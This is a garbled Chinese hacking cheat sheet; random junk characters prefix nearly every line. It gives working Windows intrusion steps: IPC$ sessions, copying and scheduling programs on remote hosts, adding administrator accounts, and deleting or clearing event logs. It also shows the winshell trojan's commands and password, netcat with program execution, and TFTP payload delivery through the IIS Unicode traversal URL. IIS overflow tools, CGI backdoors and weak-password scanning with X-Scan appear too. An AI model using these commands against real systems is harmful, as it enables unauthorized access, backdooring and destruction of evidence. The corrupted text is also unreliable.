网管和黑客都必须知道的命令
5�D//�*}b, 常用的几条NET命令:
�{8bSB�.?R �a~y�'�RyA (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
Y�\g3�h��M TJXT-\�Vk� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
07{)?1cod4 5vnrA'BhBU (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�0*��{%=M A;?|&��`�f (查看远程主机时间) net time \\IP地址
D_zZX�b�Nc lA�8`l>�I� (定时启动某个程序) at \\IP地址 02:18 readme.exe
V+�9 MoT?8 z9�Rp`z&`E (查看共享) net view \\IP地址
1\�I}�2�;� p>8D;#Hm�L (查看netbios工作组列表) nbtstat -A IP地址
4��ID5q�~� %:*
YO;dw' (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
C,|,��-CY� ^�S�rJu:Q_ (这两条把自己增加到管理员组): net user 用户名 密码 /add
j*r{2f4R�t ,.FxI��l�] net localgroup Administrators 用户名 /add
}b.%�Im<3R z*%�q@]�ym (断开连接) net use \\IP地址\ipc$ /delete
s��|r3Gv|G u;�2[A�Q�. 扫尾:
>}6%#CA��f .3�Oap*�X� del C:\winnt\system32\logfiles\*.*
�~oY^;/ �j Z4
=GM��Xj del C:\winnt\ssytem32\config\*.evt
I�I{&{S'HU YS"=yye�3e del C:\winnt\system32\dtclog\*.*
9CD_�o�s\h t\7�[�f >
del C:\winnt\system32\*.log
ye5&)d"fa( �</*6wpN del C:\winnt\system32\*.txt
I9ep`�X�6Y o|["�SY�If del C:\winnt\*.txt
��F�VJ�GL� J��DT`C2-Q del C:\winnt\*.log
j|#Bo�:2km r\�^�b(rNe 一、netsvc.exe
�H�"Wp�rHe Z/�+#pWBI! 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
C1QA�)E['V c�S�V �a�I netsvc /list \\IP地址
1yu4emye4 k��;F�Us�[ netsvc schedule \\IP地址 /query
B^^�#D0<� {3au�a:�q� netsvc \\IP地址 schedule /start
YN��i.SXH� {��R�6�ZKB 二、OpenTelnet.exe
U-M>=�3|N� D��s:'��Lb 远程启动主机的Telnet服务,并绑定端口到7878,例如:
I
b�5�rqU\ ��YUk\�Q%� OpenTelnet \\IP地址 用户名 密码 1 7878
�r_A$�DaC] pYf-S?Y�/V 然后就可以telnet到主机的7878端口,进入DOS方式下:
c{w2��Gt!� NTs �aW}g� telnet IP地址 7878
���[/8�%3 e$�rZ���5X 三、winshell.exe
u�]�UOSf�n
92oF�lEJ� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
\,�0oX!<YY `VguQl_,gA p Path (查看winshell主程序的路径信息)
?%�[jR�=w �K]w'&Qm8W b reBoot (重新启动机器)
$
$�m�V d+ 6.yu�-xm�� d shutDown (关闭机器)
]:J��$�w]\ - 1gV�eT&� s Shell (执行后你就会看到可爱的“C:\>”)
+�mT_QsLEv >i?oC^Q�M� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
9_/:[N6|c| '!�B�&:X)� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
pO�oEI+�t� ��$/U�q�0U 四、3389登陆器,GUI方式登录远程主机的
�dG�?��*y� q�'Pf�]�� 五、elsave.exe
�,Ma^�&ypH FGBbO\�<�/ 事件日志清除工具
g���*+>H1} ��O*�P�.]d elsave -s \\IP地址 -l "application" -C
M�kXmA�`cP 5�wU]�!bxr elsave -s \\IP地址 -l "system" -C
")p\q:z6�� iu�ul7VR-% elsave -s \\IP地址 -l "security" -C
>��uEzw4w >Y@H4LF;1x 执行后成功清除应用程序日志,系统日志,安全日志
,f��?�*{Q2 5�146kp|1� 六、hbulot.exe
XfIJ�4�ZM5 c�Q}{[Y�O� 开启win2kserver和winxp的3389服务
�d�ft!lBN� +k R4E�23: hbulot [/r]
-���"���9 ��&q*Aj1�7 使用/r表示安装完成后自动重起目标使设置生效。
]�7�c�=P�C -M�#Wt`6A 七、nc.exe(netcat.exe)
+R7��5�v�) o.`5D%��}i 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
(+hK�%}K> 6j|�{`Zd)G 想要连接到某处: nc [-options] hostname port[s] [ports] ...
@BMx!r�5kn ��Bk{]g=DO 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
#fM`}Ij�.A �pT�6$DB# 参数:
%E;'ln4h&, Zx>=�t�x} -e prog 程序重定向,一旦连接,就执行 [危险!!]
ti,d&c��_7 �<�9b�&<K: -g gateway source-routing hop point[s], up to 8
P[fq8l�D�A �wVt�wx0|1 -G num source-routing pointer: 4, 8, 12, ...
4s
o�J.j�8 _�DEj�F�)S -h 帮助信息
bp����a?�C �%��A0/1{( -i secs 延时的间隔
ZS��o)� �>��y+��B� -l 监听模式,用于入站连接
t�fWS)�y�7 O^�rD�HFj, -n 指定数字的IP地址,不能用hostname
@>7%���qS� _,*r_�D61S -o file 记录16进制的传输
%B?=q@!QWn ;��m�i%F3� -p port 本地端口号
w&�.a�QGR# -trkA'ew�Z -r 任意指定本地及远程端口
�
0�5�^h�" :Ll�b< MY2 -s addr 本地源地址
cm�+P]8o%{ |k9��
C�/� -u UDP模式
NwfV�L�4Xg �1{.9uw"2S -v 详细输出——用两个-v可得到更详细的内容
86�H+h�(R/ Z�j�
Z^_X3 -w secs timeout的时间
U�C$ppTCc?
{�K�!)�Ss -z 将输入输出关掉——用于扫描时
�Wa~=b��H 八、TFTPD32.EXE
^�=*;X;��7 W}�ofAk�F� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
_t�yc�gq�# !PE]C!*gv& http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
lmhLM.� 2 �Eh�BKj |y 然后可以直接令文件运行:
J9 I�:Q<;� #rg6,.I)�< http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
��DW3G���� ��f)<����6 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
!TcJ)0 ��
Kf�-JcBsrT 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�c4��z��R* O.J�N ENZf 一、一 Xscan命令行运行参数说明:
6E}qL8'5�x TJ�*�T:?>e 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�:MDKC /mC ]�JR +ayk7 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
*n"{J(Jt`� bQ��5\ ]5M xscan -file <主机列表文件名> <检测项目> [其他选项]
m)�D|l1AtF @�[v~y"tE} 其中<检测项目> 含义如下:
U`s{��Jm� xd0 L�{ue. -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
XB5�D�P��x {f��p��[BF -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
8a"%���0d# #)VF3T@�#' -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
EB|}f��z�� J|rq*X�D}q -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
]J]�h#ZH�x v(%*�b,�^
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Jfl!#UAD|n A+?`?pOm&� [其他选项] 含义如下:
A�n��/|+r\ j*m%�*_kO -v: 显示详细扫描进度
.�5{ab\_af mXs; b
2r^ -p: 跳过Ping不通的主机
;]�:@n;c\� m~ee/&��T� -o: 跳过没有检测到开放端口的主机
_u9Jxw?F@Y [=`q>|;pOv -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
